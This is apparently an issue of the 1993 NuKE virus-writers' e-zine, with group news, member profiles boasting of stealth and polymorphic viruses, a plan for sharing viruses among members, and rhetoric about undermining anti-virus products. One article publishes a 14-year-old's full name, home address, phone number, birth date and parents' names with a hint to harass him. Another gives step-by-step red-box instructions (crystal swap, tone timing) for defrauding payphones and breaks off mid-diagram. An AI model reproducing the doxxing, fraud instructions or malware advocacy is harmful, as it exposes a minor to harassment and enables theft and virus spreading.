Copy Link
Add to Bookmark
Report
NuKE Issue 05
===========================================================================
NuKE Info Journal #5
~~~~~~~~~~~~~~~~~~~~
March 13, 1993
~~~~~~~~~~~~~~
Article Topics.
~~~~~~~~~~~~~~
1. Halt! Who Goes There? (An Intro from Rock Steady)
2. State of 708 (An Intro from Nowhere Man)
3. NuKE Australia
4. NuKE TimeLine
5. DTMF Generator and Structural Design to Red & White Boxing
6. IBM 4700 Unix System, Why are these Bank System Popular?
7. An Intro to Red Boxing
8. McAfee 's ViruScan complete Virus signature listing
9. Viral Group? or Viral WareZ?
10. V.C.L. v2.0 Update
11. Data Encryption Standard
12. Disinfection on Fly, for your virus
13. Infection on Closing for your virus
14. Multipartite Viruses
15. Daemaen Virus
16. Sunday Telegraph Interview with Barbara Lewis
17. NuKE PoX v2.0 Sources
18. 1024 SBC Sources
19. Cyberculture
20. Truth on Gary Watson
21. Files Included in this Info Journal
22. Credits and Site Listing
===========================================================================
===========================================================================
Who Goes There? - A Fast Intro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings, my fellow cipher-associated phreaks, and welcome to a fifth
issue of our "Informational Journal" by NuKE associates, otherwise
expressed as our "InfoJournal" for short. It has been perhaps a long
while since our last InfoJournal; many thought we died out, as we had
calls from our local AV (AntiVirus) community to check it out. I blame
the long length on re-structuring, being new here I forgot I had an
InfoJournal to produce, and lastly to them k0ol guys that want to
take our butts and lock us up and throw away the key. "We're back!!!"
The new InfoJournal has under gone new structural changes, the biggest
being the bi-structural format: you can either execute the small
5k Hypertext file to read this like in our previous releases, or you
can take out your favourite editor and read the (NK-INFO5.TXT) directly.
Nevertheless I do hope you will execute the small 5k Hypertext file as
it contains features that are not in the data file, and it does a
CRC-32 checksum check on the data file to make sure it has not been
tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format.
We may present a text-only file soon enough, as we intend to make the
release dates a little more frequent; perhaps a monthly journal seems to
be in our interests right now.
New structural changes have been introduced into NuKE. I (Rock Steady)
am perhaps the administrator of NuKE, as I play an active role in this
dictating body, but nevertheless we also have other associates
co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and
Savage Beast are the other key-members, and we can not forget our latest
additions, Screaming Radish and TLN.
Our goal today is not a "perfect" group, nor do we wish to rule the
scene, far from the truth. In a world that is so corrupt, we try to bring
order and truth! The idea of creating "robots" to perhaps reach out
and set an example that we cannot be stopped is amazing! Yes, we have
created viruses beyond the scope of the narrow minded AV world -- in that
we are in control, and if what me must do is discredit your software then
by-darn-it we will.
I hope to set an example with this organization we call "NuKE" -- we
certainly DON'T think of NuKE a "just a" group. Normally a group is
localized, but in our case the most powerful members are scattered on
three different continents! Certainly we are not here to assimilate
anyone, we simple wish to co-join ideologies. We call ourselves
"anarchist." We suffer from injustice and repression brought upon us and
every non-illiterate computer user by the AV world. With that we looked
into our world, the sister world, the light of freedom in the dark night!
Yes, we may be "underground" but our alienation gives us the upper hand
over the AV world. We certainly know that our output perhaps will profit
AVers and crush the small guys, but until the day comes that people
understand that a piece of code is only code and not a biological hazard,
our work is not done. All we wish to do is to simply to bring out the
truth, nothing more, no conquering of the world, no destruction of
computer networks, and certainly no one falling to our mercy for help. We
give you what the butt-tight corporates hide from you. All we say is open
your eyes, mature a little: Michelangelo will not cause every computer on
the 6th day of March to die, rather it was more of a publicity stunt so
that you will fill the AVers' pockets!
One amazing case is if "Rock Steady" trades a virus with a buddy, this
is this OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if
an AntiVirus person such as Frisk were to trade viruses with Joseph Greco,
this is labelled as "the research of viruses." We, too, research our
viruses, but we take an additional step forward -- we also research the
AntiVirus products and label all of their flaws! But since we do that, the
butt-tight corporate AntiVirus people label us as evil-doers. We are flesh
just like yourselves.
"Fame is really your WORST enemy." (Tormentor/DY)
Perhaps the smartest quote I've seen, taken from my bud Tormentor, of
Demoralized Youth.
Nevertheless, I present to you this InfoJournal #5; apparently NuKE
developed farther than ever expected! And we cannot mimic anyone as
there is NO ONE to mimic. From here on NuKE is treading upon "unknown"
territory, and you will see that in the articles presented here. The
advances are "mind-boggling!" History is in the making!
Rock Steady/NuKE
===========================================================================
===========================================================================
The State of 708
~~~~~~~~~~~~~~~~
Welcome to another exciting article detailing the triumphs and
tribulations of everyone's favourite LATA, the 708/312 (Chicago) area.
Since the last InfoJournal a few events have come up which deserve
special attention, specifically the loss of two of the area's best boards,
Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on
for more details...
Ripco -- R.I.P.?
~~~~~~~~~~~~~~~~
Perhaps the most famous board in this area is the legendary Ripco ][,
a text/message-oriented board run by Dr. Ripco. Ripco, in service since
December 1983, is the area's, perhaps even the nation's, most established
underground board, and draws hundreds of users from all over North America
and had a huge collection of historic text files. However, Ripco is
probably best known for it's role in the Operation Sundevil crackdown of
1990, during which U.S. Secret Service agents broke into Dr. Ripco's
apartment, detained him without cause, and seized all of his computer
equipment, including the Ripco BBS. Due to complete lack of evidence, Dr.
Ripco was set free, and Ripco went back up later that year with donated
software and equipment. Now, in 1993, Ripco has suffered another blow.
On January 21st, Dr. Ripco decided to change his hard disk controller;
being a prudent man, he backed up all files first using FastBack Plus (this
was the fatal mistake). After reformatting his drives, the new controller
failed to work properly. When he did a restore, however, he was in for a
nasty surprise -- Fastback had failed him, and nearly all of his files were
unrecoverable. Luckily, the key system files and user logs were intact,
but most of the file bases were gone forever.
Dr. Ripco requests that if you have any of his old files, that you
re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them
to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago,
Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for
disks and postage. I encourage everyone to chip in and support Ripco in
another time of need.
Then, on March 7, there was another shocking announcement at Ripco. The
following are the highlights of the message that Dr. Ripco requested be
passed on to the general public:
"this is a bit difficult to do but it's got to be said.
technically the board isn't closing and going away forever but some major
changes are going to take place shortly and for all practical reasons, it
probably isn't going to exist as you now know it.
for about the last year, myself and several indivduals on the system have
been toying with the idea of getting the system on internet. if you are not
familar with internet, it's a world-wide network of computer systems which
basically makes a 100 line 6 gig private bbs look like a c-64 running off
one floppy.
the problem however is public access to it. most of you that have used
internet find out about that hard lesson sooner or later. chicago seems to
be one of the few places in the area where public access is a challenge.
i'd like to change that.
...to continue on with this project it has come to the point of dropping
dos completely and switching the system over to UNIX completely. this means
the program and the bbs as you see it will be dumped.
not to keep your hopes up, what will be used to replace it will look like
garbage initially. it'll be difficult to use and hard to figure out unless
you have some prior UNIX experience.
although i cannot be more specific on the new system at this time i do want
to say that ripco ][ will be put into a suspended state, in case everything
falls through and the project is abondoned, i promise to put things back to
the way it was.
so this isn't quite goodbye, just a vacation of sorts."
-- Dr. Ripco
So it seems for now that Ripco ][ is gone, at least for a while. As of the
release of this InfoJournal, Ripco is still up, although file access has
removed. Let's hope for the best...
The Marty Zwikel Affair
~~~~~~~~~~~~~~~~~~~~~~~
In October 1992 a local loser named Repeat Offender (real name: Marty
Zwikel) decided that, given the fact that had managed to actually talk to
Rock Steady, he was a bonda-fide NuKE member. Before anyone was able to
stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET.
Marty made false accusations toward Phalcon/SKISM (which I will not repeat
here), then accused GarbageHeap and Count Zero of lying to him, and falsely
claimed that Rock Steady and myself supported his statements. He even had
the audacity to add the NuKE signature after his name. Luckily cooler
tempers prevailed, and everyone came to realize that he was just a local
geek posing...he soon left the net, after complaints by all parties. For
those of you who may be under the mistaken belief that "Repeat Offender"
is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In
actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make
the big leagues and made a fool of himself. Let's take a closer look at
this asshole, shall we?
Marty Zwikel is a 14-year-old male (we think) who's currently a freshman
at Buffalo Grove high school in Northwest suburban Chicago, where he has
earned the nickname "Adolf." Why, you might ask? A few classmates of his
chose this because "he's a stupid computer geek who has no friends and
everyone hates him and we think he'll grow up to be crazy and so we call
him Adolf," they say. A year or so ago he ran a board called "No Bitches
Allowed" under another handle; luckily this immature punk was taught a
lesson by an irritated user (who chooses to remain anonymous) and
No Bitches Allowed was successfully taken down.
But Marty wouldn't learn. He brought his board back up as "The Altar,"
a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then
he caught the H/P/V craze (as has most of 708, ugh) and changed his handle
to "Repeat Offender," after a lame Richard Marx album. Then he publically
announced on Nun-Beater's Anonymous that he was starting a "secret crashing
group" called Children of the Night, and immediately mailed me demanding
to co-op with NuKE. When asked what his one-man group has actually done
he said "I can't tell you which boards I've crashed because you might be
friends with the sysops and get angry at me." (In other words, nothing.)
Then came this incident over VX_NET. Now Marty has joined a local
anti-Semitic crashing group which has been harassing and crashing boards
all over the area. Will this kid ever learn?
Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois
with his father, Dean, and his mother, Susan. Perhaps you'd like to speak
to him voice...you can reach him at +1-708-506-1980. As previously
mentioned, Marty was born on July 28, 1978 and has blighted the world ever
since. Perhaps some of you will find this information useful. I sure
have...hehehe.
Nun-Beaters Goes Down
~~~~~~~~~~~~~~~~~~~~~
In early November 1992 Guido Sanchez, BLaH president and all-around wacky
dude, took down Nun-Beaters Anonymous, his world-famous BBS, for
undisclosed personal reasons. N.B.A., as it is known, was best known for
it's zanny message bases, sysop access for first-time callers, and
complete and total lack of sysop control. In fact the sysop actually
encouraged people to leech entire file bases at one time, disabling all
file restrictions for all users and adding a special "/LEECH" command just
for that purpose. According to Guido, N.B.A. should be back sometime soon,
but, although it might have a software change, will maintain it's
free-wheeling tradition. "It should be back up this summer," says Guido.
"Actually, I don't know when it'll be back up, so whenever you're bored
put it in the re-dial queue and you might get lucky. The number is
+1-708-251-5094. Kick the habit, call N.B.A. today!"
As an interesting side-note, Nun-Beaters Anonymous was mentioned in
Boardwatch Magazine (a print publication) for having an unusual name.
"We don't even want to know," Boardwatch wrote. The strange thing about
this is that N.B.A. had been down for four months when this was published.
Changes at Hell Pit
~~~~~~~~~~~~~~~~~~~
The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only
remaining quality BBS, has been undergoing some changes recently which
deserve mention here. First of all, Kato, one of the system's two sysops,
has gone away to university, leaving Hades as the board's only acting
sysop. All messages concerning the system should be addressed to him,
*not* to Kato. Kato logs in very rarely, and only has time to read normal
private mail. Hell Pit has also purged the user list recently of the many
users who don't call regularly, don't do anything put leech, etc. This is
in response to the growning scarcity of disk space (though there is talk
of a disk upgrade) and the tremendous in-use time of the system. FidoNet
was dropped due to lack of intrest, so now Hades is in the process of
(finally!) adding NuKENET.
Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour
continues to resurface from time to time, but is just as untrue as ever.
The Hell Pit is still active, too; some people have speculated that it's
down, since the line is always busy. That's normal, folks -- Hell Pit
is in use perhaps 85% of the time. So set your modem to wardial and call
The Hell Pit at +1-708-459-7267 today!
Nowhere Man/NuKE
===========================================================================
===========================================================================
IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro
~~~~~
When most people think of Australia, they remember a famous Australian
movie, _Crocodile Dundee_. Some instantly assume that we shave with
six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we
at NuKE. Yes, we have defiantly joined the group of countries which are
endlessly advancing in computer systems technology.
Before now, no-one had intended to put Australia on the map of countries
where viruses are written. But time can not be separate from change, and
changed we have. This year, three good .ASM coders from Australia joined
NuKE in an effort to reach a common goal. Distance, race, religion and
language put aside, they all put in their two-bits worth, so everyone could
benefit (Frisk/McAfee _NoT_).
But the year has just begun, and it looks like it will be one that we won't
forget. 1992 was the year of development, the year of brainstorming and
virus writing. 1993 is the time when we wrap our presents up, when the
emphasis changes from mass writing to organized virus implementation.
Gone are the days of the passive virus. The virus that runs, infects and
destroys. Frisk/Tbave have put an end to that. Now, its _their_ turn. The
active virus is here to stay, and it shall stay as long as we can keep it.
As virus writers, we all know our direction needs to change. The user is no
longer the ultimate target, now we are to aim at destroying every last
piece of user confidence in Frisk/McAfee software.
NuKE's philosophy has changed over time, and like any philosophy, it should
be allowed to change. One must never under-estimate the power of experience
and thus we have come to the believe that:
By attacking computer users, we gain nothing and anti-
virus vendors gain all, but by attacking anti-virus
products, we not only inundate the anti-virus companies
with more work, but destroy the users confidence in their
programs.
This is the philosophy that will put the fear into every anti-virus vendor,
and now it is they who will have to face this reality. We realize what
Frisk/McAfee _want_ us to do, to continue doing what we have in the past,
but we know better than that. If there is one thing I would like to teach
McAfee/Frisk it would be to show them that they aren't dealing with any
bunch of smart kiddies, because now we will become as organized as them.
One could consider such a result of this philosophy. For every user who
loses confidence in Frisk/Mcafee and returns to NAV/CPAV, we are giving our
future viruses a much better chance of survival. Frisk/McAfee deal the
cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the
cards, thus they lack in keeping updated. This is what we need to exploit.
I'm not going to sit here and make statements that I don't believe in. Nor
could I be bothered using this introduction as some egotistical experience.
I am here to tell you, the follower, onlooker, or participante of NuKE,
that we are not just any underground group.
I admit, I can't write a virus for shit. In fact, my role in NuKE has
nothing to do with viruses. My best contribution to NuKE is in it's
management. I can only tell you using the knowledge that I have learnt over
time, that no matter how good your programmers are, no matter how good
your tutorials are, no matter how good you can hack or crack
F-prot/McAfee, it will be wasted if it's not implemented properly.
I only want one thing from NuKE. I want to see the group reach its full
potential. If I can help make the basis of a NuKE a platform more suitable
for other experienced programmers to use, then that is what I aim to do.
This is the year where NuKE will be reforming many of its practices. You
are not just observing a group of highly skilled programmers, going about
their work, but a group with a highly organized structure.
Organization is the way NuKE will survive. It is how we can stop the
Frisk/McAfee team beating us. It can help us in every way, shape and form,
with beta-testing, virus distribution, info distribution, nukenet
management, and most importantly, a single combined push for the active
anti-Frisk/anti-McAfee virus code.
This is not the time or place to start talking about NuKE-Net organization
in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is
going to be a detailed system analysis of NuKE, so we can optimize our
procedures, and not just make them into efficient ones, but the best.
Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or
associate. VX/P-S associates may also contribute ideas. All submissions
will be worked over, compared with other submissions, and modified if
necessary.
Unfortunatly, NuKE can not guarantee that results of NuKE Conf will be
published.
Before I continue, I make one pledge to all those reading this. If we, as
virus writers, want to archive our goals, then we need to work together. We
need to understand our weaknesses and our strengths, and improve our
systems where possible, for any group which can do this does not just
exist as a magnetic particle on a hard disk somewhere on someone's computer
but continues to succeed with the spirit of every participating member, the
spirit of NuKE.
Thank You.
Phrozen Doberman
Melbourne, Australia
22nd February, 1993
New Info
~~~~~~~~
I am now beta-testing a Tic File Distribution link between myself and
Screaming Radish. It seems to be working fine, and if implemented, all
members will benefit. First, however, let me explain what "TiC" is all
about.
"TiC" of TDF (Tick File Distribution) as we will refer to it is a way in
which NuKENET BBS's can transfer files between each other in a very simple
an automatic way. "TiC" will attach a hatched file (that is, a file you
intend *everyone* to have, ie: InfoJournals) to your Front Door,
D'Bridge or similar Fido-standard-compatibile mail handler. A quick
example: Rock Steady wants to release a new virus, but he wants to make
sure everyone gets it. He places a .ZIPped copy of the viruses kernel in a
special area where his "TiC" processor (ie: FileMgr) will identify this
virus as a new file to be hatched.
His "TiC" processor then determines what systems are in the export list,
and attaches this file (as a netmail file attach) to each node in the
export list, along with a file with an extension ending in .TIC. Inside
this .TIC file, is the file areas name, a description and seen-by's.
I suggest that the following areas are set up:
VIRUS_BETA = Internal beta-testing viruses.
Never to be released.
Only for members.
All bugs reports via NuKENET.
VIRUS_FINAL = Final kernels of viruses.
_MUST_ have been beta-tested.
Not for release to the general
public.
VIRUS_INFECT = Infected programs with the virus
so we may under "beta-testers."
VIRUS_SOURCE = All virus source.
VIRUS_EXTRA = Odd things. Including IJ's.
All comments, via NuKENET please.
New Memberz
~~~~~~~~~~~
I'd like to announce the following new NuKE members:
Screaming Radish - NuKE Aust. Vice Rep
Shindaq Arl'hur - Member
The Wierd One - Member
TLN - Member
Left Memberz
~~~~~~~~~~~~
I'd like to announce the following memberz have left:
Lord Venom and Screaming Jesus
The Pit BBS is *NO LONGER* a NuKE support BBS.
Memberz Analysis
~~~~~~~~~~~~~~~~
Although there existed a stage where I was the only NuKE Australian member,
the festive season has brought many a virus writer out of the closet. The
three new members, S.R., Shindaq and TLN, all have previous experience
with writing viruses.
Screaming Radish: is extremely skilled in stealth and memory
~~~~~~~~~~~~~~~~ addressing techniques, saying such a statement is like
saying the E=MCý was an okay formula. SR is MCý, SR has abilities never
dreamed about. You have a problem SR will get you a solution! We hated that
memory loss in TSR Viruses, so SR got us a routine to steal buffers from
DOS, and used those as allocating a virus! As DOS buffers are about 512
bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY
CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on...
Shindaq: Has been disabling viruses for a few years, and specializes
~~~~~~~ in dropper-type viruses. He has also written a dropper-type virus
from scratch.
TLN: Has been a virus writer for years, here's his background, in his
~~~~~ own words:
"Hi there, I am typing to you from the Newcastle, New South Wales,
Australia. I am not new to the virus scene, in fact I was a member of the
puppet group [PuKE].
Just a quick background on PuKE: it was set up about a year ago by Harry
McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all
unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE
getting large egos over large, non-resident direct-action viruses: in other
words he though they were idiots. Hence, PuKE endeavoured to write things
which compared to NuKE WareZ but on a far smaller code scale. The fruits of
Harry's labours were 'stolen' by myself, however, and that is how they grew
in the wild; otherwise they would not be around.
Although PuKE disliked NuKE, everything grows in stages, people mature, and
since then NuKE has evolved into the best Power Virus Group in the world.
(As a side note, Harry left the scene in around June 1992, as a result of
something called a Fraud squad. Good luck to Harry in whatever he is now
doing.)
I, TLN, defected to NuKE shortly after writing the Dudly virus (also
known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by
someone hacking into my board. I had no intention of releasing it into the
wild. It's unremarkable besides its lame polymorphism, which is similar to
V2P6 in end result, not generation)
I have not added anything to the virus scene since the writing of Dudley-1,
but grew active a month ago with the creation of another, yet-to-be-named
virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic
stealth virus. It hides partition infection; it hides file size increase on
directory; it infects boot sectors of ANY floppy format, current or future,
on read/write access; it infects hard disk partition on infected disk boot
or infected file execution on virgin system, and so on. One mother of a
virus.
However, I have taken great care not to make it destructive in anyway, so
no stupid AV researcher can point the finger spin the typical anti-virus
rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy
precious hours of work.'
My opinions on AV researchers in general is very low. I take great pride in
totally debunking their theories and stereotypes. I am NOT a social
recluse. I do not have a sunken chest, nor am I fat or a cowardly
insignificance. I possess a fair degree of common sense. I do not go out of
my way to trash boards or computers; in fact I steer away from such things.
Furthermore, I do not view virus writing or the discussion of viruses a
taboo subject.
Most of all I do not try to keep the public in the dark about what viruses
can and cannot do. Harry McBungus shared basically the same views but when
he tried to speak out and 'educate' the public, he instead got nailed by
the press. (The media is another of my pet hates.)
Anyway I have lost patience with hierarchy and bureaucracy... and the
media, the government and the public can basically suck John McAfee's dick
while he laughs all the way to the bank. We have provided and income for
John for long enough, it's time to make SCAN look like the total crock of
shit that it has always been.
Before I leave, just a few quick hi's, ho's and 'thanks' to:
John McAfee: Fuck You
Patricia 'It is unknown what this virus does besides replicate' Hoffman:
How about you get a clue before you make out you're the big-wig
virus analyzer. VSUM is the biggest farce since ViruScan itself.
Sara Gordon: for all the laughs your ridiculous psychological theories
about virus writers gave me. Try a bit harder.
Matt: for all the cool times we had. The legend of the 50-cent piss-up
will never leave my memory banks.
Pantera, Metallica: for providing an awesome soundtrack for virus
development!
and to NuKE for making everything possible.
TLN/NuKE"
All in all, you will be seeing a lot more from NuKE Australia this year. We
have refocused on the job, have a brand-new line up (new blood rarely does
harm) and we have a direct vision for the future. All of this would be hard
to archive without the coherence, unity and strength of NuKE!
Final Note
~~~~~~~~~~
Here is where you all get your compliments! A big thanks to Rock Steady,
for keeping the NET alive. Overall, he has managed NuKENET in the best way
possible, and this does deserve some positive feedback. I would also like
to thank him for all the charges he has incurred while keeping the NuKENET
link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp!
Secondly, I would like to thank Nowhere Man for supplying us with
beta versions of NED, Screaming Radish for helping me when I needed
suggestions and technical advice, Shindaq for keeping the BBS alive, TLN
for helping out and keeping your cool, and last but not least, Savage
Beast for keeping an excellent database of viruses.
Hubbada, Hubbada, and good virus writing to you all....
Please address all correspondence to: Phrozen Doberman,111:950/3@Nuke_NET
Phrozen Doberman/NuKE
===========================================================================
===========================================================================
A NuKE Timeline
~~~~~~~~~~~~~~~
--------------------------------------------------------------------------
October 1992
NED (NuKE Encryption Device) is completed, an encryption engine that is
very simple to use, yet overcomes all of the "flaws" of MtE to become
perhaps the wildest engine out, with an ability to understand code and
compile its very own code. Amazing. VCL v2.0 will "field test" the success
of this NuKE product by Nowhere Man.
--------------------------------------------------------------------------
November 1992
NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM.
--------------------------------------------------------------------------
November 1992
NuKENET joins with VX_NET from ARiSToLE's board.
--------------------------------------------------------------------------
November 1992
NuKENET is extended not only to Australia, but, with the help of Savage
Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on
NuKENet, along with other supporting countries like the Netherlands,
Switzerland, and Bulgaria.
--------------------------------------------------------------------------
November 1992
NuKE encounters "Death Angel" of Toronto, the virus programmer of the
original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made
himself a NuKE supporter. In our InfoJournal #3 we dissassmbled the
Ontario-512 virus, and as a result the Ontario-730 was derived from it
(which was NOT programmed by Death Angel!). Both viruses got listed as
common viruses in North America! Death Angel also gave us his original
source of Ontario-512 and -1024 (which we enclude in this issue).
--------------------------------------------------------------------------
December 1992
Screaming Radish joins up with the NuKE Team. His abilities with the 80x86
are mind-boggling and is known for the best all-nighters that I've ever
seen... Even though relations with Screaming Radish go "WAY-BACK" (he was
considered part of us for a while), only NOW did Screaming Radish
officially join NuKE by being completing his "test-of-NuKEhood" in the
Australian outback, and as a proven hacker he succeeded in hiding his
tracks and killing the Bushmen and crocodiles on his tail...<hehe> [What
can I say, it's tough to become a Aussie-NuKEer! :-)]
--------------------------------------------------------------------------
January 10th, 1993
TLN enough respect goes out to this charm... He too has succeeded the
wild-bush hunt of the Aussie, though he was never the same afterward...
<hehe> Just as Compton was put on the map by the Brothers, TLN is the
one to put Aussie onto the map. For that I gave him a whole paragraph
in this intro...
--------------------------------------------------------------------------
January 10th, 1993
Paul Ferguson thinks he's an amazing god with connections (for the local
strawberry club) since he knows how to use Directory Assistance and called
NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote]
"ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)"
Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know
if we had it!). All in all Paul showed himself to be a powerful man, with
very powerful friends, and was able to prove that he was THE god being
able to crush us with a snap of his fingers. For this NuKE awarded Paul
with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented
such an award, so we named it after Paul, therefore with respect we now
call it...
"The NuKE Big-Ol' Paul Ferguson Wanker Award"
We were going to send him a picture of a horse's ass and sign it, but we
figured a mirror will be pretty much be the same, but cheaper...
--------------------------------------------------------------------------
January 24th, 1993
Daemaen Virus created by TLN. This virus will infect ANYTHING that
moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors,
and HD partition tables. It also contains a dir-stealth routine, and will
infect files on open, creation, close, browsing, attribute functions, you
name it... A very fast, extremely fast infector. Its features will be
embedded inside VCL v2.0, coming soon in a computer near you...
--------------------------------------------------------------------------
February 1993
The Weird One and Shindaq Arl'hur have joined the NuKE team. Their
abilities are also well spoken of, being amazing guys and an asset to the
Team. (Though it'd be cooler it they talked a little more...<Hehe>) Hiya'
Guys!
--------------------------------------------------------------------------
February 1993
The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another
multipartite virus that infects boot sectors and HD Partition as well as
.EXE and .COM files. With stealth boot abilities it too will have its
features embedded inside VCL v2.0.
--------------------------------------------------------------------------
February 2nd, 1993
Rock Steady goes to the local post office and mails two letters to two NuKE
members whom will remain unknown (Phrozen Doberman and TLN) and yet where
did the letters end up? [Thanks for telling me you got 'em! NOT!]
--------------------------------------------------------------------------
February 8th, 1993
ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are
charged with computer fraud for the purpose of causing damage with
self-replicating code (viruses). England flips, and the nation of n0-Crimez
wonders how to control this loop in the hole. An "example" is supposed to
be made of the group to scare others from repeating their actions!
--------------------------------------------------------------------------
February 15th, 1993
Barbara Lewis from the English newpaper _Sunday Telegraph_ calls up
NuKE for a one-on-one interview. The bitch got nothing, as we've already
visited Compton. But she pulled a strawberry act on us -- yup, she gave us
her number, and now NuKE and Barbara got a hot "soap-opera" relation going!
Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my wanker!"
--------------------------------------------------------------------------
March 1st, 1993
Rock Steady had a vision of releasing the NuKE InfoJournal today, but
federal officers thought otherwise... [BiTE Me]
--------------------------------------------------------------------------
March 12th, 1993
After visiting Compton, Rock Steady had the sudden urge to rap out the
words to the song "Fuck Tha Police" by NWA while entering the station with
a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole
officer...
--------------------------------------------------------------------------
===========================================================================
===========================================================================
DTMF Generators, White Boxing, and Red Boxing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I've seen before me way too many fabrications of red boxes; the H/P
community enjoys to talk about it a lot, and fantasize about its abilities.
But seldom do I see an accurate example of any box construction. Perhaps
I'm simply in the wrong circle? Nevertheless I did a little research on
the actual structure of an DTMF Generator and on how to convert this into
a red and white Box. 2600 Enterprises did have the BEST red box example to
pass before me, however in Canada legislation differs quite a lot, and
any kit or package that can be hacked is not tolerated; so therefore the
famous Radio-Shack Pocket Dialer is not available here, and I would say
many other places, such as Europe or Australia, where Radio Shack is not
as widely established as in the USA. Our Radio Shacks are no bigger than a
local corner candy store, and the only useful products they sell are
calculators. Pathetic is the scene I run into everywhere I go in lovely
Canada. So since the Radio-Shack Pocket Dialer WITH MEMORY is not available
I guess we must build the actual device from scratch. It's fairly simple,
and I've already succeeded in building the DTMF Generator. It's very
easy -- it consists of one IC, a crystal to control the oscillator (in
the IC) and a key-pad.
The construction of the DTMF Tone Generator is perhaps the hardest part of
this project, and yet that is quite fairly simple. Anyhow this project does
require you to know the basics of kit building, and hopefully you know how
to use a soldering iron, as you will need to solder the IC and Crystal onto
a simple board. Now the DTMF tones are generated internally inside the IC,
but the timing depends on an external crystal oscillator. And the only
external component we have is the 3.579545 MHz crystal: right here we have
a "white box," as a white box is suppose to generate the DTMF "Touch-Tone"
tones. Now if we replaced the 3.579545 MHz crystal with an 6.5536 MHz one,
our "*" key on the key-pad will actually be DARN close to 3900 Hertz, the
EXACT frequency that a coin stimulates when being entered inside the pay-
phone. So in reality instead of putting $0.25 you can put theses tones on
the mouth piece and fool the Bell System.
Brief Operation
~~~~~~~~~~~~~~~
When entering a $0.25 into a payphone the only way the phone company knows
that you entered money by a tone which consists of a 700 Hz + 2200 Hz
(3900 Hz) being flushed into the line. For quarter you will need 3900 Hz
for 35ms in length and a pause for 35ms and then 3900hz for 35ms then a
pause...etc. This must be produced exactly FIVE times, so you should have
five tones of 3900hz of 35ms with pauses of 35ms between each.
Our DTMF generator contains a ten-number memory. When we save a number into
the DTMF memory and replay it, the redial timing will play the tone for
72.3ms and pause for 72.3ms before going to the next tone and playing that
for 72.3ms! Now the tones will be played at this speed ONLY with the
3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE GENERATING
TIMING! So when this is replaced with a 6.5535 Mhz crystal it naturally
will be alot faster and the timing will be faster. As a matter of fact the
timing is NOW 34.3ms! So anything redialled by the DTMF generator will come
out at 34.3ms and a pause for 34.3ms. Our "*" key will also sound very
close to the 700 + 2200 Hz, and therefore saving "*" 5 times in a memory
and redialling it will result into sounding like a $0.25, all one has to do
is put red box to the payphone mouth piece and the phone system will think
you entered a valid $0.25.
_____________________
/ General Description \____________________________________________________
Features
~~~~~~~~
þ 2.5V-12V operation when generating tones, which is A LOT
less voltage needed, compared to several white boxes I've
seen which ask for 16V-24V.
þ Stores and auto-dials ten 16-digit numbers.
þ Last number redial.
þ Scratchpad, meaning number storage without dialling.
þ 14 Keys, separate storage and redial buttons.
þ 2-digit overwrite for PBX access codes.
þ Low harmonic distortion.
þ Single-contact or negative-common (2-of-8) key-pad inputs.
Well, before we begin I must say that replacing the 3.57545 Mhz crystal
with an 6.5536 will give us the 3900 Hertz tone ONLY by the "*" key. With
this information the same is true for any key, on the keypad! In fact my
calculations proved that in order to get an EXACT 3900 Hertz by the "*"
key we would need a crystal of about 6.4857 Mhz. However chances of
production of an 6.4857 Mhz crystal is asking for a little too much, so
naturally we settle for the closest one possible to it; besides analog
signals are quite difficult to simulate exactly, compared to digital,
which is always exact!
This IC is from "National Semiconductor Corporation" model number TP5660.
Perhaps even the exact IC in the Radio-Shack Pocket Dialer with Memory,
as the one without memory uses the TP5650 which is this exact IC but
without memory! The Operating temperature is -30øC to +60øC. This IC
looks like so:
1ÚÄÄÄÄÄÂÄÄÂÄÄÄÄÄÄ¿16
VddÄÄ´ ÀÄÄÙ ÃÄÄÄTONE OUT
2³ National ³15
VmÄÄ´ Semiconductor ÃÄÄÄRow 5
3³ (Linear ³14
Col 1ÄÄ´ Databook) ÃÄÄÄRow 1
4³ ³13
Col 2ÄÄ´ ÃÄÄÄRow 2
5³ TP5660 ³12
